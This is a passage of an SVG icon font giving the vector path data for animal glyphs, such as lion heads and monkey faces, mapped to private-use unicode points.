23 40 43 61 64 15 16 30 32 42 51 7 10 12 21 13 34z m1 235c2 0 3 1 4 2 40 33 86 46 138 36 28-5 54-16 79-31 1-1 2-2 4-3 0 2-1 2-1 3-32 39-73 54-123 47-28-4-53-15-75-32-9-6-18-14-26-22z m-192-98c4-2 7-2 11-2 2 0 3 0 2-3 0-5 1-11 2-17 1-5 1-5 6-3 12 4 21 10 30 18 4 3 7 5 12 5 2 0 4 0 7 1 22 4 40 16 58 31-2-1-4-1-5-2-19-5-37-10-57-11-12 0-25 0-37-1-12-1-22-6-29-16z m286-319c16 23 30 48 38 75 14 42 16 84-1 126 0 1 0 3-1 3 0-1-1-2 0-3 1-28 1-56-2-84-3-26-8-51-16-76-5-14-11-28-18-41z m58 356c65-25 106-74 137-135-9 42-30 74-62 100-22 18-46 31-75 35z" />
<glyph glyph-name="lion-head-2" horiz-adv-x="1000" unicode="&#xe869;" d="M890 383c-13 65-47 115-106 148-29 17-60 26-91 37-37 12-74 24-106 46-44 30-72 71-83 123-1 6-1 12-4 17-1-1-1-1-1-2-1-2-1-5-2-8-11-63-46-110-102-141-26-14-55-24-84-34-33-11-67-21-98-39-47-28-80-67-97-120-4-12-5-25-9-38v-10c2-1 3 0 4 2 25 41 60 71 101 95 31 18 64 30 97 44 7 4 15 7 23 11 0-15-2-13 12-9 0 0 1 0 1 0 6 2 7 4 2 8-3 4-8 7-10 12 4 0 8 0 12 0s8 0 12 0c5-1 6 1 4 6-2 5-4 9-5 15 4 0 8 0 12 0 15 1 15 1 13 16-1 10-1 10 8 6l7-2c4-2 7-2 9 4 2 7 6 13 11 20 7 10 7 10 17 2 2-2 4-3 6-5 4-3 6-2 8 2 3 7 6 14 9 20 5-3 6-7 9-10 7-10 16-19 26-26 4-2 6-2 9 0 11 7 20 15 27 26 2 3 4 7 8 10 4-6 7-13 10-20 2-4 4-5 8-2 3 3 6 5 9 8 4 4 8 3 11-2 6-7 11-14 14-23 2-5 4-6 9-4 4 2 7 3 11 4 3 1 5 1 4-3 0-4-1-8-2-12-1-6 1-9 7-9 7 1 13 0 20-1-2-5-3-9-5-13-3-6-1-8 5-7 7 0 15 0 23 0-1-3-3-5-5-7-2-2-4-4-6-6-1-1-4-2-2-5 1-1 15-6 16-5 4 3 1 7 1 10 1 0 1 1 2 1 7-3 15-7 23-10 32-14 65-26 96-44 41-24 75-54 101-95 1-2 2-3 4-2v10c-2 3-2 7-3 11z m-299-183c-1 2-2 5-5 1-5-8-12-16-8-28 10-30 18-61 22-92 5-43 8-86 7-129 0-13 0-26-2-39h3c23 26 36 57 41 91 4 39 1 76-14 113-11 29-28 56-44 83z m-183-1l-24-40c-26-48-40-99-33-155 5-35 18-66 42-92h3c-1 2-1 4-2 6-3 52-1 103 5 154 4 33 11 65 21 96 4 12 2 21-4 30-3 5-5 7-8 1z m162 516c12 24 30 43 49 62 3 3 7 6 9 10h-7c-3-2-7-2-11-3-36-10-67-36-63-83 1-10 3-20 8-31 3 17 7 32 15 45z m-191 64c15-16 31-31 43-50 12-17 19-36 22-57 3 0 3 2 3 3 7 20 9 41 1 62-10 26-32 40-59 47-3 1-7 1-10 3h-7c1-3 4-5 7-8z m388-466c-28 28-60 52-90 77-3 4-5 3-7-2-2-6-4-13-8-19-3-7-2-11 4-16 26-20 48-43 67-70 29-43 44-89 42-141 0 0 0-1-2-1-1 4-1 8-2 13-9 59-34 112-76 155-12 13-25 24-40 33-5 4-9 4-12-3-4-7-7-15-11-22-3-5-2-9 2-13 8-10 17-21 26-31 58-63 87-138 89-224 1-9 0-19 0-30 5 2 6 4 7 6 10 17 19 34 27 51 22 46 34 94 27 146-4 35-18 65-43 91z m-401-10c4 5 5 9 2 15-3 5-5 10-8 16-7 14-8 14-21 5l-1-1c-56-43-91-99-106-168-2-10-4-20-5-29-2 19-2 39 3 58 9 43 31 81 61 114 13 15 28 29 44 41 5 4 7 7 3 13-3 6-5 13-7 20-2 6-4 7-10 3-24-21-49-41-73-62-14-13-26-26-36-43-25-41-29-86-21-132 8-42 25-80 46-116 3-6 7-12 11-18 2 3 1 6 2 9 1 26 1 53 7 79 10 53 31 101 64 143 14 19 30 36 45 53z m435 120c-35 26-74 45-111 66-6 2-6-1-7-5-4-11-9-21-16-30-4-4-5-9-3-14 2-7 6-14 11-20 7-8 16-15 25-22 33-27 68-53 97-85 29-35 52-72 61-118 0-1 0-3 2-4 3 0 3 3 3 4 6 26 10 52 10 78 0 11-1 21-2 32-6 50-29 89-70 118z m-562-75c25 22 52 42 78 64 9 7 15 16 19 28 1 3 2 7 0 11-9 11-16 22-19 35-2 4-4 4-7 2-6-3-11-6-17-9-34-17-67-35-97-58-25-19-45-42-56-71-9-24-14-50-13-76 0-26 4-52 10-78 0-2 0-5 3-5 2 1 2 3 2 5 2 9 4 18 7 26 17 51 50 91 90 126z m389-62c-1 1-2 3-4 3-2-1-2-4-2-5 0-20-9-36-26-46-6-3-5-5-2-9 26-37 50-75 66-118 18-47 28-96 18-147-1-6-3-12-3-20 2 1 3 2 3 3 2 1 3 2 4 3 9 13 15 27 20 41 15 50 13 101 3 151-12 56-39 103-77 144z m-222-58c3 5 3 8-2 11-2 0-3 2-4 3-12 8-20 19-21 35 0 4 0 8-3 12-5-3-8-8-11-12-28-30-48-64-61-103-14-39-18-80-17-122 1-30 8-59 21-86 4-8 9-15 16-22 1 4 0 6 0 9-3 11-5 22-5 33-4 43 6 84 20 123 16 43 40 82 67 119z m161 9c-19-9-35-2-50 9-10 7-14 16-14 29 1 11 5 17 15 21 13 6 26 11 38 18 8 5 11 14 12 23-3 1-4-1-6-2-7-5-15-8-24-7-5 0-10-1-15-4-15-6-31-6-46 0-5 3-10 4-16 4-9-1-16 1-23 7-1 1-3 3-5 3-1-3-1-5 0-8 3-9 9-15 17-20 14-6 27-11 40-18 4-2 6-5 6-10 0-6 0-12 1-18 0-4-1-7-4-10-6-4-11-9-17-13-12-8-25-11-39-5-10 4-14 0-13-11 1-4 2-8 4-11 5-10 8-10 16-3 33 31 78 31 111 1 9-8 13-8 18 3 3 6 4 11 2 17-1 5-3 7-8 5z m-51-73c-10 0-21-1-32 0-6 0-8-2-8-8 1-36 3-72 8-107 2-17 8-32 16-49 7 14 12 27 14 40 6 39 8 78 9 117 1 5-1 7-7 7z m-67-94c-3 31-3 62-2 93 0 3 1 5-1 8-3-2-3-4-4-6-9-25-13-52-15-78-3-25-3-50 2-75 6-22 16-41 36-55 1-1 4-3 6-1 2 1 0 4-1 5-11 36-19 72-21 109z m105 100c0-23 0-46-1-69-1-48-9-95-23-140-1-2-3-4-1-6 2-1 5 1 6 2 12 9 22 19 28 33 8 17 11 35 12 53 1 32-3 63-9 94-3 12-6 23-12 33z m-145 326c-4 3-8 8-13 4l-32-20c-4-2-2-4 1-6 4-4 8-1 11 0 5 2 7 1 8-3 0-4 3-7 6-9 9-5 18-8 29-7 6 0 8-3 7-10-1-3-2-6-1-9 12 3 12 3 11-11-1-14-5-28-9-41-3-9-6-17-7-26 2 2 4 5 5 8 5 13 11 27 15 40 7 21 11 42 7 64-2 8-6 14-15 16-5 2-13 1-16 8-1 2-3-1-4-2-4-2-7-4-10-7l-1 2c2 2 4 3 6 6 2 1 4 2 2 3z m176-2c-4-8-13-6-19-9-4-2-8-4-10-8-3-9-5-19-4-28 1-20 5-39 13-57 5-11 9-23 16-36 0 8-3 12-4 17-6 19-13 38-12 59 0 5 0 8 7 5 2-1 4-3 4 2-1 15-1 15 13 16 2 0 4 0 5 0 8 3 19 4 22 13 3 8 6 8 12 5 1-1 2-1 3-1 4 0 7 1 8 4 2 3-2 4-4 5-9 6-19 12-29 18-3 2-12 1-14-3-2-4 3-4 5-7 1-1 3-1 3-4-5 1-7 5-11 7-1 1-3 3-4 2z m-195-177c-1 1-3 3-4 2-3-1-1-4 0-5 2-5 5-11 8-16 10-13 23-20 40-18 13 1 27 4 41 1 1 1 3-1 4 1 1 2-1 3-3 4-9 6-18 7-28 6-17-3-34-4-47 11-4 5-8 9-11 14z m55-17c-20 2-36 12-50 25 1-19 29-33 50-25z m127-34c-10-2-19 0-29 2-2 0-4 1-4-2-1-1 1-2 2-3 7-3 13-6 20-6 8 0 15 3 21 6 1 1 2 2 2 4-1 1-3 1-4 0-3 0-5-1-8-1z m-414 266c48 31 100 48 156 58 35 7 68 19 97 41 11 9 20 19 29 33-3-1-3-1-4-1-1-1-2-1-3-2-18-15-40-21-64-23-31-2-63 1-94 1-26 0-51-4-72-19-29-21-43-51-51-84 0-2-2-5 0-7 2-1 4 1 6 3z m485 106c-29 0-56 5-79 25 0 0-1 0-3 1 4-9 17-25 28-33 29-23 62-34 98-41 47-9 93-23 135-47 8-4 14-8 22-13 1 0 2-2 4-1 1 1 0 3 0 4-2 7-3 14-5 20-17 56-53 84-111 86-30 0-59-1-89-1z m-392 14c26 9 53 13 81 6 30-8 59-6 88 7 1 1 4 1 4 4-10 2-21 3-31 6-19 5-36 15-54 23-9 5-19 7-30 6-19-2-36-10-51-22-14-12-26-25-38-40 0 0 1-1 1-2 10 4 20 8 30 12z m401 42c-13-7-26-13-40-18-12-3-24-5-36-7 1-4 4-4 6-4 29-14 59-14 89-7 7 2 15 4 22 4 26 1 49-7 73-17 4-1 8-4 13-4 1 3-2 5-3 6-11 13-22 25-35 36-26 20-57 29-89 11z m-299 14c21-7 40-18 60-28-11 21-24 40-45 52-25 14-64 5-81-19 23 5 44 2 66-5z m234-28c39 21 78 42 126 34-11 9-21 17-34 22-9 3-18 5-28 3-33-7-50-32-64-59z" />
<glyph glyph-name="lion-head" horiz-adv-x="1000" unicode="&#xe86a;" d="M633 378c53-4 107-3 160-4 39 0 77-2 115-11v1c-7 11-14 23-21 34-12 18-26 35-43 50-16 14-34 21-55 24-37 4-73 2-110 0-45-2-90-6-134-12-2 0-3 0-5 1 119 36 239 38 361 15-15 43-39 78-78 101-40 22-82 27-126 22 7 6 16 8 24 9 26 3 51 2 76-1 5-1 9 0 13 2 11 6 22 12 34 19-57 50-124 62-196 59 4 4 11 7 24 8 12 2 24 3 36 4 8 0 14 3 20 6 9 6 19 11 29 18-55 21-110 17-165 6 2 5 6 6 10 7 9 4 18 6 28 8 11 2 20 7 29 17-15 5-30 5-45 6-25 0-50-4-75-9-1 0-3-2-4 0-2 1 0 3 0 5 4 6 8 11 12 16 2 3 5 5 6 9h-16c-10-3-21-4-32-8-22-8-41-19-59-36-2 9 0 17-1 25-12-4-23-11-32-19-39-30-62-70-73-117-2-8-4-10-12-10-12 1-24 1-36 1-3 0-6-1-9-3-18-16-37-32-55-48-2-2-4-4-4-6-1-8-7-12-13-15-33-15-65-30-97-47-10-6-16-14-19-24-1-3-1-5-2-7v-20c11-21 22-42 33-63 3-5 5-7 11-8 29-2 58-5 88-8 4 0 5-3 6-7 3-14 3-14-12-14-22 0-44 1-66 1-6 1-7-1-5-6 4-12 11-24 11-35 0-12-7-24-11-35-2-4-2-6 4-6 8 0 15-1 23-1 5 0 7-2 8-7 3-10 7-21 11-31 5 2 8 6 12 10 3 3 5 3 8-1 4-7 10-14 15-22 2-3 3-3 6 0 11 12 21 24 32 36 1 1 2 2 2 3-1 10 6 8 11 7 6 0 10 2 15 6 22 23 44 46 67 69 3 3 4 6 2 11-3 12-6 24-8 35-1 4-1 7 3 8 1 0 1 0 2 0 18 3 24 15 29 31 6 20 7 37-3 55-7 11-11 24-17 36 0 2-3 4 1 6 9 6 19 11 30 17-3-8-4-15-6-22-2-5-1-9 1-14 8-17 15-34 22-50 2-4 2-8 1-12-6-15-12-29-17-45-2-8-6-12-15-14-9-3-9-4-7-14 2-8 4-16 6-24 1-5 1-8-3-12-29-31-57-62-86-94-3-2-5-4-9-3-7 2-11-1-15-6-34-40-61-83-76-134-16-60-14-119 14-175 2-3 3-7 6-9 3 11 6 23 10 34 14 37 35 70 64 97 4 3 5 6 2 10-22 35-25 73-19 113 1 0 1 1 2 2 4-16 7-32 13-47 11-29 25-55 44-79 3-4 5-4 8 0 13 15 26 31 40 46 3 4 2 6 0 10-18 23-29 48-35 76-2 12-4 23-1 35l3-8c17-40 37-77 66-109 14-14 29-26 47-35 4-2 6-1 8 3 6 16 11 31 18 46 2 5 1 8-3 11-27 24-51 50-68 82-7 13-12 27-14 42-1 2-1 5-1 9 3-3 4-6 5-8 33-64 82-108 148-135 15-6 31-10 46-13 5-1 8-1 9 6 1 19 4 38 6 57 1 7-1 10-7 13-32 17-63 36-91 59-21 18-40 39-55 63-2 4-3 8-5 12 75-74 160-127 265-145-8 29-8 58-8 86 0 7-2 9-8 10-39 8-76 19-112 34-39 17-76 38-105 69-5 5-9 11-13 16-1 2-2 3-3 6 7-5 14-11 21-16 63-47 134-73 212-83 39-5 79-7 119-10 26-3 51-6 76-15 2-1 4-2 6-2v3c-18 37-48 62-78 88-2 2-5 2-7 2-43 0-86 2-129 6-54 6-107 15-158 33-9 4-18 8-25 14 9-2 17-6 26-9 32-9 64-13 97-14z m-489 86c-5-12-10-24-15-38l-15 31c-1 2-2 4 2 5l25 7c5 1 4-2 3-5z m99 40c-2-2-3-2-4 0-6 8-12 16-19 25 20 6 40 12 60 18l0-1c-12-14-25-28-37-42z m217 73c-8-19-12-22-33-19 15 27 16 56 19 86-7-4-12-7-17-11-11-7-22-15-33-22-2-2-5-3-7-1-2 2-1 4 0 6 3 8 9 14 14 20 13 15 28 29 44 39 15 10 19 8 22-8 6-31 4-61-9-90z" />
<glyph glyph-name="lion" horiz-adv-x="1000" unicode="&#xe86b;" d="M931 503c-13 4-26 9-38 15-3 1-7 2-7 6 0 4-3 6-6 9-6 5-13 10-20 14-2 2-3 3-2 6 6 17 1 28-14 37-22 12-46 17-70 17-10 0-19 0-28-3 5-1 11-2 16-3 15-2 30-5 43-11 6-3 10-6 13-13-26 11-53 15-81 15-28 0-55-5-79-19 3 0 6 0 9 0 8 0 15 0 23-3 7-3 8-7 2-12-5-4-11-6-17-7-18-3-35 1-51 8-2-4 0-8 2-12 4-11 12-19 23-24 1-1 4-2 4-4 0-3-3-3-5-4-4 0-8-1-12-2-18-3-35-6-51-16-9-5-16-12-21-22 14 4 27 7 41 6 9-1 18-4 22-13 4-9 0-16-5-23-2-2-5-5-7-7-13-11-28-17-45-22-4-1-8-3-14-2 32 11 54 27 59 44-19-11-39-21-60-27-29-9-57-12-86-4-37 11-75 12-113 4-23-4-45-12-58-33-8-14-20-20-34-26-2-1-4-2-6-3-34-15-68-30-106-34-31-4-57 6-69 38-6 17-5 33 8 46 12 13 28 19 45 18 21-1 36-11 39-28 5-23 1-28-21-26-1 0-2 0-2 1-14 2-19 7-13 23 3 8 8 14 15 19-18 1-33-7-42-23-6-11-8-23 0-34 4 6 7 12 15 14-2-5-2-9-1-13 0-12 7-23 16-26 3 0 7-3 6 4-2 8 1 16 7 22 11-15 31-21 42-13-12 9-15 18-10 28 10 19 6 38-11 51-24 18-63 19-88 0-15-11-25-25-26-44 0-30 14-52 41-65 25-13 52-12 79-9 31 3 62 12 91 23 4 1 9 4 13 3 4-1 3-8 5-11 1-2 2-4 3-6 5-13 13-25 20-37-15 12-25 29-35 48 0-6 0-9 0-12 5-22 16-40 29-57 2-4 4-7 2-11-5-15-12-29-25-39-3-2-4-4-4-8 0-3 2-7 4-10 4-9 10-18 13-28 2-6 1-10-1-15-4-12-12-21-24-27 9-2 16 2 22 6-1-6-5-10-7-16-2-7 0-12 8-13 6 0 12 0 17 0 12 0 24 1 35-5 6-4 12 0 16 4 5 4 9 9 8 16-2 8-6 14-16 15-1 0-3 0-3 1-4 8-10 6-16 4-4-2-6-1-8 3-3 5-4 12-5 18-2 22-1 42 20 55 8 4 16 9 9 22 6-4 6-5 7-8 4-15 3-29-4-43-5-12-5-12 5-20 10-8 20-15 28-24 8-10 12-20 6-33-4-8-1-13 9-14 17-2 35-2 53 1 10 1 11 3 5 13 0 1 0 2 0 3-1 4-3 6-7 7-2 0-5 0-6 2-4 5-10 5-15 4-7-1-11 2-14 7-3 4-5 7-6 12-6 15-7 32-5 48 1 5 3 8 6 11 32 26 46 61 49 101 1 16-1 32-4 49 15-25 16-51 11-79-5-29-22-50-41-69 28 12 52 28 64 57 2 4 3 5 7 4 12-6 24-11 36-15 24-9 47-14 72-7 2 0 3 0 5-1 12-6 21-16 25-30 1-3 0-6 2-9 3 6 4 12 3 19-2 10-6 19-11 28-2 3-3 11-2 17 15-21 22-43 16-68-1-3-1-6-1-10 2-8 4-16 4-24 1-9 2-18-2-27-4-8-9-15-19-18 4-3 9-3 13-4-1-4-3-8-4-11-1-6-2-11 6-13 18-5 37-5 55 2 5 2 9 10 5 14-4 5-10 10-16 11-8 0-11 4-12 11-1 7-2 14 0 21 11 25 11 52 21 78 1 2 1 5 2 8 3 10 4 20 5 32 3-9 5-17 8-24 6-14 5-14 19-9 3 1 5 2 8 3 9 3 19 7 29 8 8 1 16-7 14-15-3-13-9-26-24-32 10-4 17 2 25 7-2-8-5-15-11-19-14-11-13-35-6-49 4-6 9-7 15-3 2 2 3 4 6 5 14 5 20 16 16 29-5 14-1 27 5 39 4 10 9 19 11 30 2 6 2 12-5 16-4 2-7 6-11 10-13 14-26 29-42 40-3 2-2 3 1 5 20 13 25 35 18 59-3 8-7 16-11 24 9-5 17-16 21-28 8-23 0-43-12-62 20 0 37 5 52 17 15 11 27 27 17 50 0 0 0 0 0 1 13-15 13-30 2-48 8 7 14 13 16 21 4 12 0 23-6 33-7 11-16 20-25 30-9 9-17 20-21 33-6 19-2 33 14 45-1-3-3-5-4-7-3-9-6-17-4-26 8-30 29-43 59-33 5 1 10 1 15 0 8-1 12-7 17-13 2 9 4 17 5 25 1 3 2 6-3 7-6 1-9 6-11 10-1 3-3 7 0 9 4 4 10 5 14 4 4-1 3-6 2-9 0 0 0-1 1-1 3 3 6 6 7 10 0 2 0 3 2 4 10 5 10 15 11 24 0 5-2 8-7 9z" />
<glyph glyph-name="monkey-2" horiz-adv-x="1000" unicode="&#xe86c;" d="M572 553c-12 10-25 12-40 6-6-3-10-8-14-12-6-7-12-7-18 0l-4 5c-12 11-29 14-44 6-14-9-21-25-17-41 4-17 17-28 36-28 13-1 16-8 9-18-1-1-2-3-3-4-7-13-6-31 4-42 10-12 26-17 41-11 15 5 24 19 24 34 0 8-2 15-7 21-2 3-3 4-6 1-5-6-11-7-16-3-4 2-7 3-11 0-7-5-16-1-19 6-3 8 1 18 9 18 10 0 21 2 30 0 8-2 16-3 24-2 15 1 28 11 33 25 4 15 1 29-11 39z m-99-59c-11 0-21 10-21 20 0 11 10 22 21 22 11 0 21-10 21-21 0-12-10-21-21-21z m99 20c-1-11-10-20-21-20-12 0-21 9-21 21 0 11 10 21 21 21s21-11 21-22z m-49-30c3-1 5-3 5-6 0-3-2-5-5-5-3 0-5 2-5 5-1 3 2 5 5 6z m147 98c0 1 0 3 0 3-13 14-9 32-13 48-6 22-11 45-24 65-7 11-10 12-21 5-1-1-3-2-5-3-4-3-7-3-8 4-2 10-4 21-8 30-6 12-12 14-23 8-7-4-15-8-22-11-5-2-8-1-11 3-7 13-15 24-23 36-6 7-14 13-22 18h-5c-6-4-8-9-10-15-10-27-21-53-39-76l-5-6c-5-5-9-7-15-2-6 6-12 5-17-2-21-29-40-59-49-94-1-3-2-7-3-11-1-6 1-14-10-13-6 1-8-5-7-10 4-48 17-93 52-128 8-8 17-13 26-18 7-4 9-8 7-16-13-60-42-116-56-175-12-52-23-104-21-157 1-37 8-72 30-103 18-26 41-44 72-49 6 0 22-2 44 6 4 2 8 5 12 9 18 18 24 40 26 64 2 25 0 49-4 74-2 11-5 14-17 12-16-1-16-2-16-16 0-20 1-40-3-61-9-35-32-34-55-17-19 14-25 35-29 57-8 41-2 82 6 122 5 24 20 43 32 63 1 2 3 3 6 3 3 0 5 0 8 0 16-2 29 1 41 15 14 17 30 15 43-3 7-10 15-13 27-12 6 1 13 0 19 0 8 0 12 4 13 11 3 25 6 49 9 74 1 13-12 27-27 32-8 3-16 4-24 4-6-1-9 2-10 8-5 17-6 17 11 21 62 17 109 69 117 132 3 23 1 47 1 71z m-69-59c0-24-13-41-35-50-6-3-7-5-6-11 6-22 1-42-17-57-17-15-38-17-59-8-21 10-32 28-32 54-1 5 5 13 3 18-3 5-12 6-18 10-25 18-31 53-13 77 18 26 52 31 78 13 4-4 7-3 11 0 19 13 39 15 60 3 19-10 29-28 28-49z m-102-39c3 0 6-2 6-6-1-3-2-5-6-5-3 0-5 2-5 5 0 3 2 5 5 6z" />
<glyph glyph-name="monkey-3" horiz-adv-x="1000" unicode="&#xe86d;" d="M926 424c-13 30-33 53-61 68-39 23-80 25-120 11-17 26-32 51-48 76 15 4 32 8 50 11l-1 2c-37 12-74 25-112 37 12 18 23 34 36 52-26-4-50-9-74-12-20-3-41-9-62-6-14 1-28 2-42 1-21-1-43-4-64-7-11 28-22 57-34 88-10-28-19-54-29-80-29 10-57 20-85 30l-1-1c23-26 45-52 68-79-41-29-70-67-89-113-86 29-153-17-179-66-30-57-18-127 27-171 42-41 122-61 191-7l45-32c-2-2-3-4-5-6-19-28-31-60-34-94-1-7 1-11 6-15 17-14 36-24 57-31 85-28 171-29 257-4 23 7 45 17 64 32 8 5 12 12 10 21-4 15-5 30-11 43-7 19-17 37-26 56 14 9 28 19 43 29 65-51 142-35 184 2 48 41 64 108 39 165z m-788-138c-42 34-52 93-23 140 26 42 84 59 130 38-2-10-3-19-5-30-22 11-44 13-66 3-17-7-30-19-38-36-15-30-7-69 20-91 26-21 65-26 100 4l15-26c-34-32-95-33-133-2z m179 87c0 39 28 69 69 71 37 0 69-32 69-70 0-38-32-70-69-70-38 1-70 31-69 69z m147-156c-11 3-21 6-33 10 6 21 12 43 18 65 12-3 22-6 33-9-6-22-12-43-18-66z m72 0c-6 22-12 43-18 65 11 4 21 6 33 10 6-22 11-43 18-65-12-3-22-6-33-10z m81 87c-36 0-67 31-67 67 0 36 30 67 66 67 36 0 67-31 67-67 0-36-30-67-66-67z m249-15c-39-34-100-35-137-1 5 9 10 17 15 26 37-32 79-23 103-1 27 24 32 65 12 97-15 23-52 46-99 24l-5 30c40 22 99 5 127-35 31-44 24-105-16-140z m-559-222c0 0 0-2 1-4 12-45 43-74 86-90 66-23 133-24 201-4 48 15 83 44 97 94 1 2 1 4 1 4-129-58-258-58-386 0z" />
<glyph glyph-name="monkey-face" horiz-adv-x="1000" unicode="&#xe86e;" d="M440 305c17-9 46-8 60 6 19-15 38-15 59-7 5 2 11 6 9 12-1 5-5 11-10 13-20 8-40 8-58-6-17 14-39 13-58 6-4-2-8-8-9-12-1-4 4-9 7-12z m177 62c28-4 53 23 52 50-1 30-21 51-51 51-28 0-50-20-51-51-2-27 25-53 50-50z m134-138c-13 7-26 5-37-3-23-17-49-29-76-38-46-16-93-21-142-22-7 0-14 1-21 2-15 1-30 0-44 3-28 7-56 13-83 23-21 7-40 20-60 32-9 5-19 9-31 6-12-3-20-10-24-22-4-13-2-26 9-34 13-11 27-21 41-29 36-19 75-32 115-39 34-7 68-10 102-11 14 1 29 2 43 3 13 0 26 1 38 3 22 5 44 9 65 15 39 11 75 27 106 51 9 7 17 15 17 28 1 14-6 25-18 32z m172 300c-29 57-87 80-145 71-61 115-157 171-285 169-121-2-212-59-270-168-30 3-60 1-88-14-29-15-51-38-62-70-3-9-7-18-9-28-1-11-3-24 0-44 2-13 8-25 13-37 12-27 31-47 57-60 8-4 16-7 24-11-6-13-12-27-16-41-10-29-13-59-11-89 4-53 24-99 57-140 26-34 59-60 96-82 33-19 68-33 105-42 13-3 28-6 43-8 20-3 106-12 222 21 18 7 35 15 51 24 24 13 46 28 67 46 21 18 39 39 55 62 21 32 36 67 41 105 6 49-2 96-24 140-1 1-1 2-2 4 44 15 75 44 88 88 12 35 10 71-7 104z m-725-128c-20 1-38 8-51 24-19 24-20 56-2 82 11 17 38 29 57 26-2-17-5-34-4-50 1-24 5-47 8-71 1-7-1-12-8-11z m600-201c-5-30-16-57-34-81-21-29-48-53-79-71-37-22-76-36-118-44-30-5-59-7-89-5-54 4-105 16-153 43-32 18-60 41-83 71-18 22-30 47-37 75-9 39-7 78 9 116 12 28 28 53 50 74 10 9 12 16 9 28-7 26-8 52-6 78 4 48 18 92 49 128 18 21 39 38 66 46 24 7 46 1 67-10 28-14 43-39 49-70 1-5 1-11 1-17l3 0c-1 18 4 35 12 50 16 28 40 44 72 49 34 6 60-10 83-31 33-29 51-67 59-110 6-29 8-58 4-87-2-12-5-24-7-36-1-4-1-8 3-11 26-21 43-47 57-76 10-23 15-48 16-73 1-12-1-24-3-36z m15 202c-5-1-12-4-17 2-1 2-2 5-2 7 3 18 7 36 8 55 1 22-1 44-1 67 26 3 57-16 65-48 10-38-12-77-53-83z m-430-35c27-3 51 23 51 48 0 33-24 53-51 53-30 0-50-22-51-52-1-26 24-52 51-49z m78-436h1s-2 0-1 0z" />
<glyph glyph-name="monkey" horiz-adv-x="1000" unicode="&#xe86f;" d="M852 387c-9 62-46 110-79 161-21 33-58 51-84 80-6 7-20 9-12 23 1 1-1 5-3 7-3 4-7 8-11 12 4 2 9-1 13 2-4 8-12 11-19 15 5 2 8 3 13 5-13 13-29 15-45 17 10 9 10 11-2 15-8 3-17 5-26 6-14 1-23 6-31 19-14 21-33 38-60 39-31 0-58-11-76-38-1-2-2-5-4-5-14-1-10-13-8-18 8-21-3-35-15-49-8-7-16-14-16-25 0-10 1-19 11-26 8-8 16-12 27-9 3 1 7 6 11 0 3-5 5-10 2-16-7-11-6-11-3-21 2-4 0-9 0-14 6 1 7 7 12 5 0-10 2-21-1-31-8-28-17-56-25-83-5-14-10-17-24-11-13 6-28 9-42 7-20-2-39 1-57 7-27 10-56 7-84 9-7 0-12-3-16-8-14-17-31-31-43-50-10-16-11-17 2-31 4-6 7-14 16-13 11 1 21 1 32 0 8 0 9 4 7 9-2 5-5 9-9 12-6 4-12 6-17 10-4 3-10 9-3 13 15 6 24 18 36 28 3 3 6 4 12 1-13-10-24-18-35-28-3-2-6-6-3-9 3-3 6-1 9 0 18 6 37 9 52 22 2 2 4 0 6 0l53-12c26-6 51-18 79-16 4 0 8 0 10-4-6-8-14-10-22-14-13-7-24-15-30-29-8-21-16-41-29-59-7-10-8-22-9-34-1-5-1-11 3-13 5-2 6 5 10 8 0 0 1 0 2 0 4-4 5-8 5-13 0-11-3-22 13-28 18-7 28-9 41 7 4 5 7 10 4 16-1 2-2 4-4 4-7-1-8-7-10-12 0-2 0-4-3-4-3 0-4 3-4 5-1 9 0 19 3 28 7 21 17 42 17 65 0 9 5 13 13 18 14 7 27-10 39 1 27-4 52 2 78 6 12 2 24 3 37 4-3-5-7-6-11-6-8-1-10-4-4-10 7-7 11-16 20-22 2-2 4-3 3-6 0-4-3-4-6-4-23-5-45-9-69-10-15-1-29-2-41-14-3-4-9-7-14-9-13-5-11-15-12-25 0-9 4-16 12-20 8-3 17-6 26-9 3-1 5-1 7 2 1 3 1 6-1 8-2 1-7 1-3 5 8 11 20 17 36 20-6-6-9-10-13-14-2-2-5-6-2-10 3-4 7-2 10 0 14 9 28 17 41 26 5 4 10 5 16 5 20-2 40 1 59 8 5 2 10 3 15 1 18-8 34-19 49-35-24-5-47-12-71-8-22 4-43 12-66 6-13-3-32-14-36-24 13 1 23 15 40 9-4-2-5-3-7-4-22-8-38-23-50-43-5-7-2-24 4-24 14 1 28 5 42 7 0 0 1 1 1 2 15 17 34 24 55 22 10-1 18 1 27 2 21 2 39 12 59 17 20 4 38 11 57 16 15 5 19 17 10 31-6 8-13 17-19 26-4 5-12 11-8 16 3 4 13 2 20 1 3-1 6-2 8-3 14-12 29-10 44-4 7 2 15 3 22 5 4 1 6 0 6-5 7-71-2-138-40-200-34-53-77-95-139-114-46-14-93-18-140-15-21 1-41 5-58 17-8 6-16 12-25 15-11 3-15 13-22 20-9 7-22 8-27 20-1 2-3 3-6 1-9-5-14-10-11-21 3-10 7-19 13-26 28-30 61-50 101-57 41-6 82-3 122 3 47 8 92 20 130 49 89 68 136 159 141 271 2 36 1 72 0 109 1 13 3 26 1 39z m-342 319c15-14 34-12 54-19-8-1-12-2-17-3 1-7 9-7 12-13-19-3-37-6-48-22-11-16-15-34-16-54-6 5-5 11-5 16-1 5 0 11 0 16-10 1-9-10-17-13-3 10 1 18 7 25 15 15 15 15 0 29 34 6 37 16 30 38z m-65 21c-4-2-7-4-11 0-1 1-1 4 0 7 0 5 6 5 8 4 13-6 27 3 40-1 5-2 9-2 13-6-6-4-11-6-19-3-10 5-20 3-31-1z m117-302c-12-3-24-5-37-6-17-3-35-6-54-10 1 20 13 34 20 50 6 13 13 27 11 42 0 8 2 10 9 7 6-3 11-6 16-10 11-10 10-14 1-25-12-12-17-26-14-43 1-6 3-9 10-5 6 3 14 4 21 5 17 1 19 4 17 20-1 3-1 6-2 9 7-3 9-8 11-13 6-12 4-17-9-21z m152 17c-9 7-19 11-30 15-5 2-10 3-9-7 1-18 8-35 6-54-1-8-11-19-19-20-3 0-7 0-8 3 0 3 3 4 5 6 17 11 17 11 11 30-2 10-6 21-6 30 0 25-22 41-25 64 0 1 0 2 1 6 7-16 12-30 22-42 2-3 4-5 9-6 15-1 27-11 40-18 2-1 4-3 3-7z" />
